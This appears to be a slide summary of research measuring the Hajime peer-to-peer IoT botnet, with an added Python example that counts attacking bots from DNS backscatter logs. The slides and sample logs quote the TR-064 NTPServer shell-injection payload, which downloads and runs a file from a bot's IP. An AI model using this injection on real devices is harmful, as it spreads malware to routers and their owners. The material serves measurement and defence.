Measurement and Analysis of Hajime, a Peer-to-Peer IoT Botnet · 2019-03-04

Measurement and Analysis of Hajime, a Peer-to-Peer IoT Botnet
Stephen Herwig, Katura Harvey, George Hughey, Richard Roberts, Dave Levin

IoT Botnets Pose a Major Threat
Mirai: largest DoS attacks in history.
Hajime: Mirai successor; runs on many architectures; regular updates, new exploits.

Goals
To inform defenses and intervention: characterize steady-state behavior; understand the effect of new exploits on the botnet.

Hajime uses BitTorrent's DHT for Command-and-Control
1. Announce: "I have <key>"
2. Get: "Who has <key>?"
3. Repeated Gets construct the entire set of bots with a given file.
uTP sessions with bots: uTP handshakes yield per-bot long-lived keys.

Exploits
TR-064 shell injection, Chimay-Red, GPON shell injection.
TR-064 shell injection payload (Bot IP = 1.2.3.4):
  NTPServer=`cd /tmp;wget http://1.2.3.4:5678/X;chmod 777 X; ./X`
Intended victim (non-vulnerable) -> shell injection -> DNS lookup -> D-root.
Non-vulnerable hosts interpret this as a hostname with an unfamiliar TLD (./X`), so the failed lookup reaches D-root, which learns the attacking bots' IP addresses (DNS backscatter).

Datasets
DHT scans; uTP scans (10.5M keys); binary reverse engineering (52 payloads); DNS backscatter (125M queries).

Botnet Size
[Figure: number of distinct bots over time (20-minute bins), 01-26 to 06-01, 0K to 100K; annotated with the atk.mipseb update and the .i.mipseb update]
Steady-state of ~40K bots. Peaks of 95K after the Chimay-Red and GPON exploits.

Churn
[Figure: number of births and deaths over time (20-minute bins), 01-26 to 06-01, 0K to 45K; annotated with the atk.mipseb update and the .i.mipseb update]
Steady-state churn: 2K. Median bot lifetime: 5 hours. Reboots and reinfections are common.

Location
[Figure: number of distinct bots over time (20-minute bins) by country: Brazil, Iran, Mexico, China, India, S. Korea, US, Turkey, Russia, Indonesia, Others; annotated with the atk.mipseb update and the .i.mipseb update]
52.5% of bots are in Brazil. The geographic makeup of IoT botnets can change rapidly: Russia goes from 500 active bots per hour to 6K following Chimay-Red.

Devices
[Figure: number of distinct bots per country by architecture (arm5, arm6, arm7, mipsel, mipseb, unknown), 0K to 600K with a broken axis at 4M to 5M; two panels: BR, CN, IR, IN, KR, US, TR, RU, MX, IT and BR, IR, MX, CN, IN, KR, US, TR, RU, ID]
Devices overwhelmingly run MIPS: 74.2% of bot devices are MIPS big endian.

Exploit Effects
Chimay-Red increases the proportion of MikroTik bots from 0.79% to 80.29%.
The GPON exploit disproportionately affects Mexico: it changes Mexico from primarily ARM to MIPS.

Evolution of TR-064 Exploit
[Figure: TR-064 injection attempts over time (20-minute bins), 11/16 to 05/18, 0 to 60K; phases: Mirai deployment, Hajime testing, Hajime deployment; annotated with the Hajime config update, .i.mipseb update, atk.mipseb update, .i.mipsel update and atk.mipsel update]

We are longitudinally measuring Hajime.
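The DNS backscatter measurement above can be reproduced on query logs: a non-vulnerable host treats the injected NTPServer command as a hostname, so the attacking bot's download URL arrives at the root server inside the QNAME. This added example (not the authors' code) parses constructed root-server log lines in an assumed "<time> <querier IP> <QNAME>" layout, pulls the bot IP, port and payload name out of the leaked command, and counts distinct attacking bots.

```python
import re
from collections import Counter
from dataclasses import dataclass
from typing import Iterable, List

# Constructed sample of root-server query-log lines ("<time> <querier IP> <QNAME>").
# The querier is the non-vulnerable host (or its resolver) that tried to resolve
# the backticked TR-064 command as a hostname; the IP after "wget http://" is the
# attacking bot that hosts the payload. Addresses are documentation ranges.
SAMPLE_QUERIES = [
    "2018-01-26T00:00:01 203.0.113.7 `cd /tmp;wget http://198.51.100.23:5678/X;chmod 777 X; ./X`",
    "2018-01-26T00:00:05 203.0.113.9 `cd /tmp;wget http://198.51.100.23:5678/X;chmod 777 X; ./X`",
    "2018-01-26T00:00:09 203.0.113.7 `cd /tmp;wget http://192.0.2.44:8080/atk.mipseb;chmod 777 atk.mipseb; ./atk.mipseb`",
    "2018-01-26T00:00:12 203.0.113.11 www.example.com",
    "2018-01-26T00:00:15 203.0.113.12 `cd /tmp;wget http://256.1.1.1:80/X;chmod 777 X; ./X`",
]

# Download URL embedded in the injected command: host, port and fetched file name.
PAYLOAD_URL = re.compile(r"wget\s+https?://(\d{1,3}(?:\.\d{1,3}){3}):(\d{1,5})/([^;`\s]+)")

@dataclass(frozen=True)
class Backscatter:
    time: str
    querier: str   # host (or resolver) that leaked the failed lookup
    bot_ip: str    # attacking bot hosting the payload
    port: int
    payload: str   # file name the victim was told to fetch

def valid_ipv4(addr: str) -> bool:
    return all(0 <= int(o) <= 255 for o in addr.split("."))

def parse_backscatter(lines: Iterable[str]) -> List[Backscatter]:
    """Keep only queries whose QNAME carries a TR-064 style download command."""
    found = []
    for line in lines:
        time, querier, qname = line.split(" ", 2)
        m = PAYLOAD_URL.search(qname)
        if not m or not valid_ipv4(m.group(1)):   # skip normal names and junk IPs
            continue
        found.append(Backscatter(time, querier, m.group(1), int(m.group(2)), m.group(3)))
    return found

def bots_by_attempts(records: List[Backscatter]) -> Counter:
    """Distinct attacking bot IPs, weighted by the number of leaked lookups seen."""
    return Counter(r.bot_ip for r in records)

if __name__ == "__main__":
    recs = parse_backscatter(SAMPLE_QUERIES)
    for ip, n in bots_by_attempts(recs).most_common():
        print(f"{ip}: {n} injection attempt(s) observed via DNS backscatter")
```

Only attempts against non-vulnerable hosts leak this way, so the count is a lower bound on bot activity; the payload name lets the same log distinguish update waves such as atk.mipseb.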
